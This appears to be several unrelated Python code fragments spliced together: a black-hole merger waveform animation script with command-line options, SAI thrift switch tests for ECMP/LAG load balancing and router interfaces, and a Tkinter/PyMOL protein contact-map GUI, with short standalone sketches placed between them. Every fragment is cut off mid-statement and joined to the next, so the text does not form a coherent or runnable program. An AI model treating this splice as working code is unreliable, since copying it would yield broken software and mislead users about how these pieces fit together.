Add in propagation delay zero_idx = np.argmin(np.abs(t-max_range)) vmax = np.max(get_waveform_on_grid(t, zero_idx, h_nrsur, \ sph_gridZ)) # Symmetric about 0 vmin = -vmax #NOTE: There is a glitch if I don't skip the first index frames = range(1, len(t)) if HANGUP_HACKS: ## Use this if you want to speed up the movie when using a low ## uniform_time_step_size frames = np.sort(np.append(range(1,len(t))[::5],np.argmin(np.abs(t)))) hist_frames = 100 if not no_freeze_near_merger: # Repeat freeze_idx 75 times, this is a hacky way to freeze the video frames = np.sort(np.append(frames, [freeze_idx]*75)) use_Kerr = not use_spin_angular_momentum_for_arrows fargs = (lines, hist_frames, t, t_binary, dataLines_binary, \ dataLines_remnant, properties_text, freeze_text, timestep_text, \ time_text, max_range, BhA_traj, BhB_traj, BhC_traj, L, h_nrsur, \ shape_BhA, shape_BhB, shape_BhC, \ sph_gridX, gridX, sph_gridY, gridY, sph_gridZ, gridZ, \ q, mA, mB, chiA_nrsur, chiB_nrsur, mf, chif, vf, \ waveform_end_time, freeze_idx, draw_full_trajectory, ax, \ vmin, vmax, linthresh, camera_traj, height_map, \ project_on_all_planes, no_wave_time_series, \ no_freeze_near_merger, no_time_label, use_Kerr) # save still and exit if still_time is not None: time_tag = '%d'%(abs(still_time)) if still_time < 0: time_tag = 'm%s'%time_tag update_lines(np.argmin(np.abs(t-still_time)), *fargs) still_fnametag = '%s_%s'%(save_file.split('.')[0], time_tag) P.savefig('%s.png'%still_fnametag, bbox_inches='tight') P.savefig('%s.pdf'%still_fnametag, bbox_inches='tight') exit() line_ani = animation.FuncAnimation(fig, update_lines, frames, \ fargs=fargs, \ interval=50, blit=False, repeat=True, repeat_delay=5e3) return line_ani class CustomFormatter(argparse.ArgumentDefaultsHelpFormatter, \ argparse.RawDescriptionHelpFormatter): pass ############################# main ################################## if __name__ == '__main__': parser = argparse.ArgumentParser(description=__doc__, formatter_class=CustomFormatter) pp_standard = parser.add_argument_group("Standard options") pp_standard.add_argument('--q', type=float, required=True, help='Mass ratio. Currently 1 <= q <= 2.') pp_standard.add_argument('--chiA', type=float, required=True, nargs=3, help='Dimensionless spin of BhA at omega_ref. List of size 3.') pp_standard.add_argument('--chiB', type=float, required=True, nargs=3, help='Dimensionless spin of BhB at omega_ref. List of size 3.') pp_standard.add_argument('--omega_ref', type=float, default=None, help='Reference orbital frequency, in units ' \ 'of rad/M. Currently, >= 0.018. If specified, assumes the above ' \ 'spins are specified at this frequency, in the coorbital frame. ' \ 'Else, assumes the spins are specified at t=-100M from the peak ' \ 'of the waveform, in the coorbital frame. ' \ 'The coorbital frame is defined as: ' \ 'The z-axis is along the orbital angular momentum at that ' \ 'time/frequency. '\ 'The x-axis is along the line of separation from the smaller BH ' \ 'to the larger BH at that time/frequency. ' \ 'The y-axis completes the triad. ' \ ) pp_standard.add_argument('--save_file', type=str, default=None, help='File to save animation to. If given, will save animation to ' \ 'this file. Else will show animation. Use this option if live ' \ 'rendering is slow. Allowed extensions are mp4 and gif. mp4 has ' \ 'the best quality. We use lower quality for gif to reduce file ' \ 'size. 
Example: --save_file movie.mp4') pp_standard.add_argument('--auto_rotate_camera', default=False, \ action='store_true', \ help='Auto rotates camera viewing angle. You can see the waveform ' \ 'change.') pp_special = parser.add_argument_group( \ "Non standard options (mainly for developers)") pp_special.add_argument('--project_on_all_planes', default=False, \ action='store_true', \ help='If given, projects the waveform on all three back planes. ' \ 'By default only does the x-y plane at the bottom. This can ' \ 'interfere with the BH shapes. This is disabled if ' \ 'auto_rotate_camera is set.') pp_special.add_argument('--height_map', default=False, \ action='store_true', \ help='Map h to a height to visualize in the xy plane ' \ 'instead of a contour plot. Turns off project_on_all_planes.') pp_special.add_argument('--draw_full_trajectory', default=False, \ action='store_true', \ help='If given, draws the entire trajectories of the components. ' \ 'Else only retains the last 3/4th of an orbit.') pp_special.add_argument('--use_spin_angular_momentum_for_arrows', \ default=False, action='store_true', \ help='By default the spin arrows are proportional to the Kerr ' \ 'parameter a. If this is
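# A standalone sketch of the remnant-fit evaluation that the animation code above
# performs with surfinBH. The binary parameters below are illustrative only; with
# omega0=None the spins are interpreted at t = -100M from the waveform peak, in the
# coorbital frame, as described in the --omega_ref help text.
import numpy as np
import surfinBH

q = 1.5                    # mass ratio mA/mB >= 1 (illustrative)
chiA = [0.0, 0.0, 0.5]     # dimensionless spin of the heavier black hole (illustrative)
chiB = [0.0, 0.0, -0.3]    # dimensionless spin of the lighter black hole (illustrative)

fit = surfinBH.LoadFits('surfinBH7dq2')
mf, chif, vf, mf_err, chif_err, vf_err = fit.all(q, chiA, chiB, omega0=None)

print('remnant mass (M):', mf)
print('remnant spin magnitude:', np.linalg.norm(chif))
print('kick speed (km/s):', np.linalg.norm(vf) * 2.998e5)   # vf is in units of c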
from rif to lag member total_changing_ports = 15 #the first port that will start as rif, that means that the first iteratio will only have port #1 first_changing_port = 2 total_dst_port = 16 v4_enabled = 1 v6_enabled = 1 ip_mask = '255.255.0.0' addr_family = SAI_IP_ADDR_FAMILY_IPV4 lag_members = [] nhop_group = 0 lag = 0 lag_rif = 0 port_rifs = [] neighbors = [] nhops = [] nhop_gmembers = [] routes = [] vr_id = 0 mac_action = SAI_PACKET_ACTION_FORWARD src_port = 0 mac_pool = [] def setup_ecmp_lag_group(self, first_rif_port): self.lag = self.client.sai_thrift_create_lag([]) #adding lag members self.lag_members.append(sai_thrift_create_lag_member(self.client, self.lag, port_list[1])) for i in range(self.first_changing_port,first_rif_port): self.lag_members.append(sai_thrift_create_lag_member(self.client, self.lag, port_list[i])) self.lag_rif = sai_thrift_create_router_interface(self.client, self.vr_id, SAI_ROUTER_INTERFACE_TYPE_PORT, self.lag, 0, self.v4_enabled, self.v6_enabled, '') sai_thrift_create_neighbor(self.client, self.addr_family, self.lag_rif, "10.10.0.1", self.mac_pool[self.total_changing_ports]) sai_thrift_create_route(self.client, self.vr_id,self.addr_family, "10.10.0.1", '255.255.255.0', self.lag_rif) self.nhops.append(sai_thrift_create_nhop(self.client, self.addr_family, "10.10.0.1" , self.lag_rif)) for i in range(first_rif_port,self.total_changing_ports): self.port_rifs.append(sai_thrift_create_router_interface(self.client, self.vr_id, SAI_ROUTER_INTERFACE_TYPE_PORT, port_list[i], 0, self.v4_enabled, self.v6_enabled, '')) for i in range(len(self.port_rifs)): sai_thrift_create_neighbor(self.client, self.addr_family, self.port_rifs[i], "10.10.%s.1" % str(i+1), self.mac_pool[i]) self.nhops.append(sai_thrift_create_nhop(self.client, self.addr_family, "10.10.%s.1" % str(i+1), self.port_rifs[i])) sai_thrift_create_route(self.client, self.vr_id, self.addr_family, "10.10.%s.1" % str(i+1), '255.255.255.0', self.port_rifs[i]) self.nhop_group = sai_thrift_create_next_hop_group(self.client) for nhop in self.nhops: self.nhop_gmembers.append(sai_thrift_create_next_hop_group_member(self.client, self.nhop_group, nhop)) sai_thrift_create_route(self.client, self.vr_id, self.addr_family, "10.20.0.0", self.ip_mask, self.nhop_group) def teardown_ecmp_lag_group(self, first_rif_port): sai_thrift_remove_route(self.client, self.vr_id, self.addr_family, "10.20.0.0", self.ip_mask, self.nhop_group) sai_thrift_remove_route(self.client, self.vr_id, self.addr_family, "10.10.0.1", '255.255.255.0', self.lag_rif) for i in range(self.total_changing_ports - first_rif_port): sai_thrift_remove_route(self.client, self.vr_id, self.addr_family, "10.10.%s.1" % str(i+1), '255.255.255.0', self.port_rifs[i]) for nhop_gmember in self.nhop_gmembers: self.client.sai_thrift_remove_next_hop_group_member(nhop_gmember) self.client.sai_thrift_remove_next_hop_group(self.nhop_group) for nhop in self.nhops: self.client.sai_thrift_remove_next_hop(nhop) del self.nhops[:] for i in range(self.total_changing_ports - first_rif_port): sai_thrift_remove_neighbor(self.client, self.addr_family, self.port_rifs[i], "10.10.%s.1" % str(i+1), self.mac_pool[i]) print self.port_rifs for rif in self.port_rifs: self.client.sai_thrift_remove_router_interface(rif) del self.port_rifs[:] for lag_member in self.lag_members: self.client.sai_thrift_remove_lag_member(lag_member) del self.lag_members[:] sai_thrift_remove_neighbor(self.client, self.addr_family, self.lag_rif, "10.10.0.1", self.mac_pool[self.total_changing_ports]) 
self.client.sai_thrift_remove_router_interface(self.lag_rif) self.client.sai_thrift_remove_lag(self.lag) def polarizationCheck(self,packets,avg): if (avg < 150): self.assertTrue((packets >= (avg * 0.65)),"Not all paths are equally balanced, %s" % packets) self.assertTrue((packets <= (avg * 1.35)),"Not all paths are equally balanced, %s" % packets) else: self.assertTrue((packets >= (avg * 0.8)),"Not all paths are equally balanced, %s" % packets) self.assertTrue((packets <= (avg * 1.2)),"Not all paths are equally balanced, %s" % packets) def send_and_verify_packets(self, first_rif_port): exp_pkts = [0]*self.total_dst_port pkt_counter = [0] * self.total_dst_port destanation_ports = range(self.total_dst_port + 1) sport = 0x1234 dport = 0x50 src_mac_start = '00:22:22:22:{0}:{1}' IP_LAST_WORD_RANGE = 254 IP_2ND_LAST_WORD_RANGE = 16 for i in xrange(IP_LAST_WORD_RANGE): for j in xrange(IP_2ND_LAST_WORD_RANGE): ip_src = '10.0.' + str(j) + '.' + str(i+1) ip_dst = '10.20.' + str(j+1) + '.1' src_mac = src_mac_start.format(str(i).zfill(4)[:2], str(i).zfill(4)[2:]) pkt = simple_tcp_packet( eth_dst=router_mac, eth_src=src_mac, ip_src=ip_src, ip_dst=ip_dst, ip_id=i, tcp_sport=sport, tcp_dport=dport, ip_ttl=64) exp_pkt = simple_tcp_packet( eth_dst=self.mac_pool[0], eth_src=router_mac, ip_src=ip_src, ip_dst=ip_dst, ip_id=i, tcp_sport=sport, tcp_dport=dport, ip_ttl=63) masked_exp_pkt = Mask(exp_pkt) masked_exp_pkt.set_do_not_care_scapy(ptf.packet.Ether,"dst") send_packet(self, 0, str(pkt)) (match_index,rcv_pkt) = verify_packet_any_port(self,masked_exp_pkt,destanation_ports) logging.debug("Found expected packet from port %d" % destanation_ports[match_index]) pkt_counter[match_index] += 1 sport = random.randint(0,0xffff) dport = random.randint(0,0xffff) #final uniform distribution check logging.debug(pkt_counter) logging.debug(first_rif_port) lag_packets = sum(pkt_counter[1:first_rif_port]) lag_average = lag_packets/(len(self.lag_members) + 1) logging.debug("the sum of packets through the lag is " + str(lag_packets)) logging.debug("the lag average for the lag is " + str(lag_average)) for stat_port in range(1,first_rif_port): logging.debug( "PORT #"+str(stat_port)+":") logging.debug(str(pkt_counter[stat_port])) self.polarizationCheck(pkt_counter[stat_port],lag_average) rifs_average = sum(pkt_counter)/(len(self.port_rifs) + 1) logging.debug("lag average " + str(lag_average)) self.polarizationCheck(lag_packets,rifs_average) for stat_port in range(first_rif_port,self.total_changing_ports): logging.debug( "PORT #"+str(stat_port)+":") logging.debug(str(pkt_counter[stat_port])) self.polarizationCheck(pkt_counter[stat_port],rifs_average) def runTest(self): """ For sai server, testing different lags with router ---- Test for 16 ports minimun ---- Steps 1. Create virtual router, and rif for src port 2. create a lag and lag rif,add ports to the lag and the rest of the ports connect to rifs 3. configure neighbors, nhops for all of the rifs 4. make ecmp route with all of the nhops 5. send packets from src port 6. check polarization check in the lag and in the ecmp 7. remove rifs, neighbors, nhops, lag members, lag and route 8. repeat steps 3-7 with differnt numbers of lag members and rifs 8. clean up. 
""" print print "L3MultipleEcmpLagTest" #general configuration random.seed(1) switch_init(self.client) if (len(port_list) < (self.total_dst_port + 1) ) : assert False, "skip this test as it requires 17 ports" self.src_port = port_list[0] for i in range (self.total_dst_port+1): self.mac_pool.append('00:11:22:33:44:'+str(50+i)) self.vr_id = sai_thrift_create_virtual_router(self.client, self.v4_enabled, self.v6_enabled) rif_port_id = sai_thrift_create_router_interface(self.client, self.vr_id, SAI_ROUTER_INTERFACE_TYPE_PORT, self.src_port, 0, self.v4_enabled, self.v6_enabled, '') try: # The first iteration will configure port #1 as a lag with only one member # and will configure port #2 to port #15 as rifs, # the rif will advance until all of the ports will be in lag and only one if port for first_rif_port in range(self.first_changing_port,self.total_changing_ports): print "Testing with " + str(first_rif_port - 1) + " lag members." self.setup_ecmp_lag_group(first_rif_port) self.send_and_verify_packets(first_rif_port) self.teardown_ecmp_lag_group(first_rif_port) finally: #in case of an exception in the send_and_verify_packets self.teardown_ecmp_lag_group(self.total_dst_port)#check what number to send for tear down self.client.sai_thrift_remove_router_interface(rif_port_id) self.client.sai_thrift_remove_virtual_router(self.vr_id) print "END OF TEST" @group('l3') @group('1D') class L3BridgeAndSubPortRifTest(sai_base_test.ThriftInterfaceDataPlane): def runTest(self): print "" switch_init(self.client) v4_enabled = 1 v6_enabled = 1 vlan1_id = 10 vlan2_id = 100 port1 = port_list[0] port2 = port_list[1] port3 = port_list[2] port4 = port_list[3] mac1 = '00:01:01:01:01:01' ip1 = '11.11.11.1' mac2 = '00:02:02:02:02:02' ip2 = '10.10.10.2' ip_addr_subnet = '10.10.10.0' ip_mask = '255.255.255.0' mac3 = '00:22:22:22:22:22' ip3 = '10.0.0.1' vlan1_oid = sai_thrift_create_vlan(self.client, vlan1_id) vlan2_oid = sai_thrift_create_vlan(self.client, vlan2_id) bridge_id = sai_thrift_create_bridge(self.client, SAI_BRIDGE_TYPE_1D) sai_thrift_vlan_remove_ports(self.client, switch.default_vlan.oid, [port2, port3, port4]) bport1_id = sai_thrift_create_bridge_sub_port(self.client, port2, bridge_id, vlan2_id) bport2_id = sai_thrift_create_bridge_sub_port(self.client, port3, bridge_id, vlan2_id) bport3_id = sai_thrift_create_bridge_sub_port(self.client, port4, bridge_id, vlan2_id) vr_id = sai_thrift_create_virtual_router(self.client, v4_enabled, v6_enabled) sub_port_rif_oid = sai_thrift_create_router_interface(self.client, vr_id, SAI_ROUTER_INTERFACE_TYPE_SUB_PORT, port1, vlan1_oid, v4_enabled, v6_enabled, '') bridge_rif_oid = sai_thrift_create_router_interface(self.client, vr_id, SAI_ROUTER_INTERFACE_TYPE_BRIDGE, 0, 0, v4_enabled, v6_enabled, '') bridge_rif_bp = sai_thrift_create_bridge_rif_port(self.client, bridge_id, bridge_rif_oid) sai_thrift_create_neighbor(self.client, SAI_IP_ADDR_FAMILY_IPV4, bridge_rif_oid, ip2, mac2) sai_thrift_create_route(self.client, vr_id, SAI_IP_ADDR_FAMILY_IPV4, ip_addr_subnet, ip_mask, bridge_rif_oid) local_pkt = simple_tcp_packet(eth_src=mac2, eth_dst=mac3, dl_vlan_enable=True, vlan_vid=vlan2_id, ip_src=ip2, ip_dst=ip3, ip_id=102, ip_ttl=64) L3_pkt = simple_tcp_packet(eth_src=mac1, eth_dst=router_mac, ip_src=ip1, ip_dst=ip2, dl_vlan_enable=True, vlan_vid=vlan1_id, ip_id=105, ip_ttl=64) exp_pkt = simple_tcp_packet(eth_src=router_mac, eth_dst=mac2, ip_src=ip1, ip_dst=ip2, dl_vlan_enable=True, vlan_vid=vlan2_id, ip_id=105, ip_ttl=63) try: print "Sending packet ({} -> {}) : Sub-port rif (port 
1 : vlan {}) -> Bridge rif (flooded)".format(ip1, ip2, vlan1_id) send_packet(self, 0, str(L3_pkt)) verify_packets(self, exp_pkt, [1, 2, 3]) print "Success" print "Sending unknown L2 packet [{} -> {}] to learn FDB and flood within a .1D bridge".format(mac1, mac3) send_packet(self, 1, str(local_pkt)) verify_packets(self, local_pkt, [2, 3]) print "Success" print "Sending packet ({} -> {}) : Sub-port rif (port 1 : vlan {}) -> Bridge rif".format(ip1, ip2, vlan1_id) send_packet(self, 0, str(L3_pkt)) verify_packets(self, exp_pkt, [1]) print "Success" finally: sai_thrift_remove_route(self.client, vr_id, SAI_IP_ADDR_FAMILY_IPV4, ip_addr_subnet, ip_mask, bridge_rif_oid) sai_thrift_remove_neighbor(self.client, SAI_IP_ADDR_FAMILY_IPV4, bridge_rif_oid, ip2, mac2) self.client.sai_thrift_remove_router_interface(sub_port_rif_oid) self.client.sai_thrift_remove_bridge_port(bridge_rif_bp) self.client.sai_thrift_remove_router_interface(bridge_rif_oid) self.client.sai_thrift_remove_virtual_router(vr_id) sai_thrift_remove_bridge_sub_port(self.client, bport1_id, port2) sai_thrift_remove_bridge_sub_port(self.client, bport2_id, port3) sai_thrift_remove_bridge_sub_port(self.client, bport3_id, port4) self.client.sai_thrift_remove_bridge(bridge_id) self.client.sai_thrift_remove_vlan(vlan1_oid) self.client.sai_thrift_remove_vlan(vlan2_oid) sai_thrift_create_vlan_member(self.client, switch.default_vlan.oid, port2, SAI_VLAN_TAGGING_MODE_UNTAGGED) sai_thrift_create_vlan_member(self.client, switch.default_vlan.oid, port3, SAI_VLAN_TAGGING_MODE_UNTAGGED) sai_thrift_create_vlan_member(self.client, switch.default_vlan.oid, port4, SAI_VLAN_TAGGING_MODE_UNTAGGED) @group('l3') @group('1D') class L3SubPortAndVLANRifTest(sai_base_test.ThriftInterfaceDataPlane): def runTest(self): print "" switch_init(self.client) port1 = port_list[0] port2 = port_list[1] v4_enabled = 1 v6_enabled = 1 vlan1_id = 10 vlan2_id = 100 mac_action = SAI_PACKET_ACTION_FORWARD addr_family = SAI_IP_ADDR_FAMILY_IPV4 ip_addr1 = '10.10.10.1' ip_addr1_subnet = '10.10.10.0' ip_mask1 = '255.255.255.0' dmac1 = '00:0a:00:00:00:01' ip_addr2 = '11.11.11.1' ip_addr2_subnet = '11.11.11.0' ip_mask2 = '255.255.255.0' dmac2 = '00:0b:00:00:00:01' vlan1_oid = sai_thrift_create_vlan(self.client, vlan1_id) vlan2_oid = sai_thrift_create_vlan(self.client, vlan2_id) vlan_member1 = sai_thrift_create_vlan_member(self.client, vlan1_oid, port1, SAI_VLAN_TAGGING_MODE_TAGGED) attr_value = sai_thrift_attribute_value_t(u16=vlan1_id) attr = sai_thrift_attribute_t(id=SAI_PORT_ATTR_PORT_VLAN_ID, value=attr_value) self.client.sai_thrift_set_port_attribute(port1, attr) vr_id = sai_thrift_create_virtual_router(self.client, v4_enabled, v6_enabled) rif_id1 = sai_thrift_create_router_interface(self.client, vr_id, SAI_ROUTER_INTERFACE_TYPE_VLAN, 0, vlan1_oid, v4_enabled, v6_enabled, '') rif_id2 = sai_thrift_create_router_interface(self.client, vr_id, SAI_ROUTER_INTERFACE_TYPE_SUB_PORT, port2, vlan2_oid, v4_enabled, v6_enabled, '') sai_thrift_create_neighbor(self.client, addr_family, rif_id1, ip_addr1, dmac1) sai_thrift_create_route(self.client, vr_id, addr_family, ip_addr1_subnet, ip_mask1, rif_id1) sai_thrift_create_neighbor(self.client, addr_family, rif_id2, ip_addr2, dmac2) sai_thrift_create_route(self.client, vr_id, addr_family, ip_addr2_subnet, ip_mask2, rif_id2) try: print "Sending packet ({} -> {}) : VLAN {} rif -> Sub-port (port 2 : vlan {}) rif".format(ip_addr1, ip_addr2, vlan1_id, vlan2_id) pkt = simple_tcp_packet(eth_dst=router_mac, eth_src=dmac1, ip_dst=ip_addr2, ip_src=ip_addr1, 
ip_id=105, ip_ttl=64, dl_vlan_enable=True, vlan_vid=vlan1_id) exp_pkt = simple_tcp_packet(eth_dst=dmac2, eth_src=router_mac, ip_dst=ip_addr2, ip_src=ip_addr1, ip_id=105, ip_ttl=63, dl_vlan_enable=True, vlan_vid=vlan2_id) send_packet(self, 0, str(pkt)) verify_packets(self, exp_pkt, [1]) print "Success" print "Sending packet ({} -> {}) : Sub-port (port 2 : vlan {}) rif -> VLAN {} rif".format(ip_addr2, ip_addr1, vlan2_id, vlan1_id) pkt = simple_tcp_packet(eth_dst=router_mac, eth_src=dmac2, ip_dst=ip_addr1, ip_src=ip_addr2, ip_id=105, ip_ttl=64, dl_vlan_enable=True, vlan_vid=vlan2_id) exp_pkt = simple_tcp_packet(eth_dst=dmac1, eth_src=router_mac, ip_dst=ip_addr1, ip_src=ip_addr2, ip_id=105, ip_ttl=63, dl_vlan_enable=True, vlan_vid=vlan1_id) send_packet(self, 1, str(pkt)) verify_packets(self, exp_pkt, [0]) print "Success" finally: sai_thrift_remove_route(self.client, vr_id, addr_family, ip_addr1_subnet, ip_mask1, rif_id1) sai_thrift_remove_route(self.client, vr_id, addr_family, ip_addr2_subnet, ip_mask2, rif_id2) sai_thrift_remove_neighbor(self.client, addr_family, rif_id1, ip_addr1, dmac1) sai_thrift_remove_neighbor(self.client, addr_family, rif_id2, ip_addr2, dmac2) self.client.sai_thrift_remove_router_interface(rif_id1) self.client.sai_thrift_remove_router_interface(rif_id2) self.client.sai_thrift_remove_vlan_member(vlan_member1) self.client.sai_thrift_remove_vlan(vlan1_oid) self.client.sai_thrift_remove_vlan(vlan2_oid) self.client.sai_thrift_remove_virtual_router(vr_id) attr_value = sai_thrift_attribute_value_t(u16=1) attr
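# A pure-Python sketch of the load-balancing ("polarization") check used by
# L3MultipleEcmpLagTest above: every egress port should carry a packet count close to
# the average, with a wider tolerance when per-port traffic is light. The thresholds
# mirror polarizationCheck; the helper itself is hypothetical.
def check_balanced(per_port_counts, low_traffic_threshold=150):
    avg = sum(per_port_counts) / float(len(per_port_counts))
    tolerance = 0.35 if avg < low_traffic_threshold else 0.20
    return all(avg * (1 - tolerance) <= c <= avg * (1 + tolerance)
               for c in per_port_counts)

# 4096 hashed flows spread over four equal-cost paths should stay within 20% of the mean:
assert check_balanced([1010, 1050, 990, 1046])
# a badly polarized hash with one hot path fails the check:
assert not check_balanced([1800, 700, 800, 796])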
self.sl_mid.grid(column=0, row=3) self.slider_mid.set((self.slider_max.get() - self.slider_min.get()) / 2) else: norm = None self.sl_mid.grid_forget() cmapa = cm.get_cmap(self.colormap.get()) cmapa.set_bad(color="0.75") cmapa.set_over(color="black") cmapa.set_under(color="white") heatmap = self.aplot.pcolorfast(self.data, cmap=cmapa, vmin=self.slider_min.get(), vmax=self.slider_max.get()) self.cmapa = cmapa self.norm = norm self.recolor_by_trueness_var.set(False) self.recolor_by_any_trueness.set(False) self.recolor_by_trueness() for patch in self.SELECTED_REGIONS: ## TODO only draws on top self.draw_selected_patch(patch) self.canvas.draw() mpl.colorbar.ColorbarBase(self.cmap_ax, cmap=self.cmapa, norm=self.norm, orientation='vertical') self.cmap_canvas.draw() self.redraw_bonds() def getTopXValues(self): try: X = int(self.top_values_cnt.get()) except: tkMessageBox.showerror(message="There is something wrong with the entered value \n Error code: (PEBKAC)") return if X==-1: X=0 if type(self.data) == np.ma.MaskedArray: cutoff = np.ma.sort(np.triu(self.data), axis=None, fill_value=0.)[-X] else: cutoff = np.sort(np.triu(self.data), axis=None)[-X] percent = X * 100. / ((self.data.shape[0] * self.data.shape[1] - self.data.shape[1]) / 2) self.top_values_pc.set(int(percent + 1)) self.slider_min.set(cutoff) def getTopPCValues(self): try: PC = int(self.top_values_pc.get()) except: tkMessageBox.showerror(message="There is something wrong with the entered value \n Error code: (PEBKAC)") return if PC==-1: X=0 else: X = int(((self.data.shape[0] * self.data.shape[1] - self.data.shape[1]) / 2) * (PC / 100.)) self.top_values_cnt.set(int(X)) if type(self.data) == np.ma.MaskedArray: cutoff = np.ma.sort(np.triu(self.data), axis=None, fill_value=0.)[-X] else: cutoff = np.sort(np.triu(self.data), axis=None)[-X] self.slider_min.set(cutoff) def spin_comp_distance_change(self,*args): if not self.LAST_HIT_KEY.get(): return self.makeSSplot() def spin_comp_distance_click(self,*args): self.LAST_HIT_KEY.set(1) def spin_comp_distance_key(self,event): self.LAST_HIT_KEY.set(event.keysym in ["Return", "KP_Enter", "Extended-Return"]) if not self.LAST_HIT_KEY.get(): return self.makeSSplot() def spin_min_change_key(self,event): self.LAST_HIT_KEY.set(event.keysym in ["Return", "KP_Enter", "Extended-Return"]) if not self.LAST_HIT_KEY.get(): return self.spin_min_change() def spin_max_change_key(self,event): self.LAST_HIT_KEY.set(event.keysym in ["Return", "KP_Enter", "Extended-Return"]) if not self.LAST_HIT_KEY.get(): return self.spin_max_change() def mosjws_key(self,event): self.LAST_HIT_KEY.set(event.keysym in ["Return", "KP_Enter", "Extended-Return"]) if not self.LAST_HIT_KEY.get(): return if self.mark_on_similar_just_within.get() and any( [len(x) == 1 or x[0].split()[3] != x[1].split()[3] for x in self.DRAWN_BONDS]): self.redraw_bonds() self.makeSSplot() def mosjwc_change(self,*args): if not self.LAST_HIT_KEY.get(): return if self.mark_on_similar_just_within.get() and any( [len(x) == 1 or x[0].split()[3] != x[1].split()[3] for x in self.DRAWN_BONDS]): self.redraw_bonds() self.makeSSplot() def menu_atom_mode_change(self,*args): dm.Structure.mode = self.comp_atom_mode.get() self.clear_pymol_bonds() for structure in self.STRUCTURES: structure.makeContactMap(self.current_state_var.get(), mchain=False) if structure.chains_to_keep: structure.makeContactMap(self.current_state_var.get(), mchain=True) if dm.Structure.isRNA: if "anonical" in self.comp_atom_mode.get(): self.rna_nonwc_pairs_check.grid(column=0, row=2) 
self.dist_frame.grid_forget() else: self.rna_nonwc_pairs_check.grid_forget() self.dist_frame.grid(column=1, row=0) self.makeSSplot() def show_bonds_window(self, *args): if self.show_bond_selection.get(): self.window_of_selected_bonds.deiconify() else: self.window_of_selected_bonds.withdraw() def update_list_of_bonds(self): ###TODO z okazji interfaceu self.window_of_selected_bonds_text.config(state=Tk.NORMAL) self.window_of_selected_bonds_text.delete('1.0',Tk.END) def get_dist(a1,a2): if "c." in a1: try: return "%5.3f" % cmd.get_distance(a1,a2) except pymol.CmdException: return "Error" else: atom = "and name CA and elem C" if not dm.Structure.isRNA else "and name P and elem P" if self.interface_mode.get(): at1 = "{} and c. {} and i. {} {} and (alt A or alt '')".format(self.current_structure_obj_var.struct_1.objId, self.current_structure_obj_var.struct_1.chain_simple, a1.strip(self.current_structure_obj_var.struct_1.chain_simple), atom) at2 = "{} and c. {} and i. {} {} and (alt A or alt '')".format(self.current_structure_obj_var.struct_2.objId, self.current_structure_obj_var.struct_2.chain_simple, a2.strip( self.current_structure_obj_var.struct_2.chain_simple), atom) else: at1 = "{} and c. {} and i. {} {} and (alt A or alt '')".format(self.current_structure_obj_var.objId, a1[-1], a1[:-1], atom) at2 = "{} and c. {} and i. {} {} and (alt A or alt '')".format(self.current_structure_obj_var.objId, a2[-1], a2[:-1], atom) try: return "%5.3f" % cmd.get_distance(at1,at2) except pymol.CmdException: return "Error" def get_res(s): i = s.split("i. ")[1].split()[0] c = s.split("c. ")[1].split()[0] return (i + c.strip()) text = "Currently selected residue pairs:\n" for x in self.DRAWN_BONDS: if x[0][:5] == "dist_": text+="{}\t{}\t{}\n".format(x[1],x[2],get_dist(x[1],x[2])) else: y=map(get_res, x[:2]) text+="\t".join(y+[get_dist(*x[:2])])+"\n" self.window_of_selected_bonds_text.insert('1.0', text) self.window_of_selected_bonds_text.config(state="disabled") def binaryColormap(self): cmapa = colors.ListedColormap(['grey','red','blue']) bounds = [0.,self.slider_min.get(),self.slider_mid.get(),self.slider_max.get()] norm = colors.BoundaryNorm(bounds, cmapa.N) return cmapa,norm def binaryColormapColor(self,value): return (.5,.5,.5,1.) if value<self.slider_min.get() else (1.,0.,0.,1.) if value<=self.slider_mid.get() else (0.,0.,1.,1.) 
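# A standalone sketch of the thresholded colour scale that binaryColormap() builds
# above: values below the lower slider are grey, values between the lower and middle
# sliders red, and values up to the upper slider blue. The threshold values and the
# random data here are illustrative only.
import numpy as np
import matplotlib.pyplot as plt
from matplotlib import colors

low, mid, high = 0.2, 0.5, 1.0
cmap = colors.ListedColormap(['grey', 'red', 'blue'])
norm = colors.BoundaryNorm([0.0, low, mid, high], cmap.N)

data = np.random.rand(50, 50)
fig, ax = plt.subplots()
ax.pcolorfast(data, cmap=cmap, norm=norm)
fig.colorbar(plt.cm.ScalarMappable(norm=norm, cmap=cmap), ax=ax)
plt.show()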
def comparison_mode_engaged(self,*args): self.clear_pymol_bonds() self.window_of_selected_bonds_text.config(state=Tk.NORMAL) self.window_of_selected_bonds_text.delete('1.0',Tk.END) self.window_of_selected_bonds_text.config(state="disabled") self.overlay_var.set(0) self.makeSSplot(from_native=1) def overlay(self): self.clear_pymol_bonds() if self.overlay_var.get(): self.spin_min_var_4cmap.set("just DI") self.spin_max_var_4cmap.set("just\nnative") self.comp_mode.set(0) else: self.spin_min_var_4cmap.set("%6f"%self.slider_min.get()) self.spin_max_var_4cmap.set("%6f"%self.slider_max.get()) self.makeSSplot(from_overlay=1) mpl.colorbar.ColorbarBase(self.cmap_ax, cmap=self.cmapa, norm=self.norm, orientation='vertical') self.cmap_canvas.draw() def recolor_by_any_trueness_do(self, *args): self.recolor_by_trueness(any=True) def recolor_by_trueness(self,any=False,*args): if any and self.recolor_by_any_trueness.get(): self.recolor_by_trueness_var.set(0) if not any and self.recolor_by_trueness_var.get(): self.recolor_by_any_trueness.set(0) if (self.recolor_by_trueness_var.get() or self.recolor_by_any_trueness.get()): self.SSMenu.entryconfig(11, state=Tk.NORMAL) self.SSMenu.entryconfig(9, state=Tk.NORMAL) self.SSMenu.entryconfig(10, state=Tk.NORMAL) self.spin_min_var_4cmap.set("FP") self.spin_max_var_4cmap.set("TP (intra)") else: self.SSMenu.entryconfig(11, state=Tk.DISABLED) self.SSMenu.entryconfig(9, state=Tk.DISABLED) self.SSMenu.entryconfig(10, state=Tk.DISABLED) self.spin_min_var_4cmap.set(str(self.spin_min_var.get())) self.spin_max_var_4cmap.set(str(self.spin_max_var.get())) if self.map_structure_mode.get() != self.OPCJE[0]: self.makeSSplot() mpl.colorbar.ColorbarBase(self.cmap_ax, cmap=self.cmapa, norm=self.norm, orientation='vertical') self.cmap_canvas.draw() self.canvas.draw() self.redraw_bonds() def mapSelectionBetweenPlots(self): # TODO I powinien wywalac jak full plot? from_single = "Single" in self.plot_to_remember to_single = 'Single' in self.map_structure_mode.get() mapping = None flip_axes = False #0,1-move x to y, 2-move y to x if self.SELECTED_REGIONS == []: return if from_single: from_struct = self.plot_to_remember.split("ture: ")[1] from_struct_obj = [x for x in self.STRUCTURES if x.objId in from_struct][0] if to_single: 